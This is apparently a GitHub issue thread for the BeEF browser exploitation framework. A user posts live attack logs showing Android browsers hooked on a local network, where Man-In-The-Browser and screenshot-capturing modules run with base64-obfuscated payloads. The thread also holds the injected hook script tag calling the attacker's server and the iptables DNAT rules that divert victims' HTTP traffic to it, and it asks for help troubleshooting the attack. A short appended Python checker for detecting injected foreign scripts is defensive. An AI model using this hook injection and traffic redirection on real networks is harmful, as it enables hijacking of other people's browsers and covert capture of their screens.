    [23:18:41][>] {"lastseen":"1692573521","count":32,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:42][>] {"lastseen":"1692573522","count":33,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:49][>] Server: mounted handler '/command/man_in_the_browser.js'
    [23:18:49][>] Hard Load module: 'man_in_the_browser'

[23:18:56][>] [Evasion] Applying technique: minify
[23:18:56][>] [OBFUSCATION - Minifier] JavaScript has been minified
[23:18:56][>] [Evasion] Applying technique: base_64
[23:18:56][>] [OBFUSCATION - Base64] Javascript has been base64 encoded
[23:18:56][>] [Evasion] Obfuscation completed (498 bytes)
[23:18:57][>] Event: Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:1, mod: 43, name:'Man-In-The-Browser']
[23:18:57][*] Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:1, mod: 43, name:'Man-In-The-Browser']
[23:18:57][>] Event: Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:1, mod: 43, name:'Man-In-The-Browser']
[23:18:57][*] Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:1, mod: 43, name:'Man-In-The-Browser']
[23:19:22][>] Server: mounted handler '/command/spyder_eye.js'
[23:19:22][>] Hard Load module: 'spyder_eye'
[23:19:27][>] Server: mounted handler '/h2c.js'
[23:19:27][*] File [/modules/browser/spyder_eye/html2canvas.min.js] bound to Url [/h2c.js] using Content-type [text/javascript]
[23:19:27][>] [Evasion] Applying technique: minify

[23:19:27][>] [OBFUSCATION - Minifier] JavaScript has been minified
[23:19:27][>] [Evasion] Applying technique: base_64
[23:19:27][>] [OBFUSCATION - Base64] Javascript has been base64 encoded
[23:19:27][>] [Evasion] Obfuscation completed (1090 bytes)

@ChillVibesMushroom
Author

[23:19:30][*] Browser screenshot saved to '/home/kali/.beef/screenshot__-2023-08-20_23-19-30_2.png'
[23:19:30][>] Event: Browser screenshot saved to '/home/kali/.beef/screenshot_-_2023-08-20_23-19-30_2.png'
[23:19:30][*] Url [/h2c.js] unmounted
[23:19:30][>] Event: Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:2, mod: 255, name:'Spyder Eye']
[23:19:30][*] Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:2, mod: 255, name:'Spyder Eye']
[23:19:30][>] Event: 78.647s - [Console] log: [2023-08-20 18:19:39] [Spyder Eye] Taking snapshot #0
[23:19:30][>] Event: 78.654s - [Console] log: 1ms
[23:19:30][>] Event: 78.659s - [Console] log: [2023-08-20 18:19:39] [Spyder Eye] Took snapshot successfully
[23:19:30][>] Event: 78.927s - [Console] log: 274ms
[23:19:42][>] {"lastseen":"1692573582","count":89,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:43][>] {"lastseen":"1692573583","count":90,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:44][>] {"lastseen":"1692573584","count":91,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:45][>] {"lastseen":"1692573585","count":92,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:46][>] {"lastseen":"1692573586","count":93,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:47][>] {"lastseen":"1692573587","count":94,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:48][>] {"lastseen":"1692573588","count":95,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:49][>] {"lastseen":"1692573589","count":96,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:50][>] {"lastseen":"1692573590","count":97,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:51][>] {"lastseen":"1692573591","count":98,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:52][>] {"lastseen":"1692573592","count":99,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:53][>] {"lastseen":"1692573593","count":100,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:54][>] {"lastseen":"1692573594","count":101,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:55][>] {"lastseen":"1692573595","count":102,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
/*","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:56][>]

  1. Retrieve browser logs from your browser's developer console (Ctrl + Shift + I or F12 depending on browser)
  2. Retrieve your server-side logs from ~/.beef/beef.log
    • If using beef-xss logs found with journalctl -u beef-xss

journalctl -u beef-xss
-- No entries --

Memo: This is the JavaScript code I am injecting into HTTP web pages.
Beef.js

<script src="http://192.168.1.5:3000/hook.js"></script>

This method didn't cause me problems in the past.

Iptables rules

sudo iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
DROP tcp -- anywhere anywhere multiport dports ftp,ssh,telnet

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

sudo iptables -L -t nat
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere anywhere tcp dpt:http to:192.168.1.5:8080

Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination

The script is supposedly being injected, and I am kind of having issues with other scripts being injected. I also had some issues with my Samsung Galaxy Tab A7 Lite but not my other, older Motorola phone.

What seems to be the problem?

I did manage to hook the browser the second time around, only on the admin page 192.168.1.1. This is on a 5 GHz network, Spectrum Router 5260.

So that means maybe traffic flow isn't reaching me correctly, right? If the hook is injecting, that means the signal back may be an issue?

I did manage to screen capture an all-white blank page on the phone, as you can see within the debug output, lol. Someone please help me diagnose and fix this issue.

If we request additional information and we don't hear back from you within a week, we will be closing the ticket off.
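A defender-side check for the injection described in this post, added here as an example and not part of the original issue or of BeEF's own code: it parses a captured HTML response and reports every `<script>` whose origin differs from the page's origin and from an allowlist. The function names, the allowlisted CDN origin and the sample HTML are constructed for illustration; only the hook URL and the router address come from the post.

```python
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urljoin, urlsplit

# Constructed sample: a plaintext admin page with one script tag added in transit.
SAMPLE_PAGE_URL = "http://192.168.1.1/"
SAMPLE_HTML = """<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example.com/lib.min.js"></script>
<script src="http://192.168.1.5:3000/hook.js"></script>
</head><body>Router admin</body></html>"""

def origin(url):
    """Return (scheme, host, port) with default ports filled in."""
    parts = urlsplit(url)
    port = parts.port or {"http": 80, "https": 443}.get(parts.scheme)
    return (parts.scheme, (parts.hostname or "").lower(), port)

def is_ip_literal(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

class ScriptCollector(HTMLParser):
    """Collects the src attribute of every <script> element."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.sources.append(src.strip())

def find_foreign_scripts(page_url, html, allowed_origins=()):
    """Report scripts loaded from an origin that is neither the page's nor allowlisted."""
    collector = ScriptCollector()
    collector.feed(html)
    trusted = {origin(page_url)} | {origin(o) for o in allowed_origins}
    findings = []
    for src in collector.sources:
        absolute = urljoin(page_url, src)  # resolves relative and // sources
        scheme, host, port = origin(absolute)
        if (scheme, host, port) in trusted:
            continue
        checks = [("plaintext", scheme == "http"), ("ip-literal host", is_ip_literal(host)),
                  ("non-standard port", port not in (80, 443))]
        reasons = ["cross-origin"] + [name for name, hit in checks if hit]
        findings.append({"src": absolute, "reasons": reasons})
    return findings
```

Run over responses captured at the client and at the origin server, a finding that appears only on the client side indicates modification in transit, which serving the page over HTTPS prevents.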

@ChillVibesMushroom
Author

I tried to give as much detail regarding Beef-XSS as possible while in production, so this is a live output of the attack going on right before this. I'll try with other devices here in a bit in order to get you a diagnosis of the output when targeting different models.

@ChillVibesMushroom
Author

I'm having the same issue with every Android device. Awkward.

@ChillVibesMushroom
Author

[Screenshots attached: beefrunningproperly, CentosPage, connectingcorrectly, nmapscan, scriptinpage]

@ChillVibesMushroom
Author

The issue may be here, where apache2 is auto-loaded on beef execution:

    # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
    web_server_imitation:
        enable: true
        type: "apache" # Supported: apache, iis, nginx
        hook_404: false # inject BeEF hook in HTTP 404 responses
        hook_root: false # inject BeEF hook in the server home page

@github-actions
Contributor

This issue has been marked as stale due to inactivity and will be closed in 7 days

@github-actions github-actions bot added the Stale Used to mark issues with inactivity label Aug 28, 2023
@github-actions github-actions bot closed this as completed Sep 4, 2023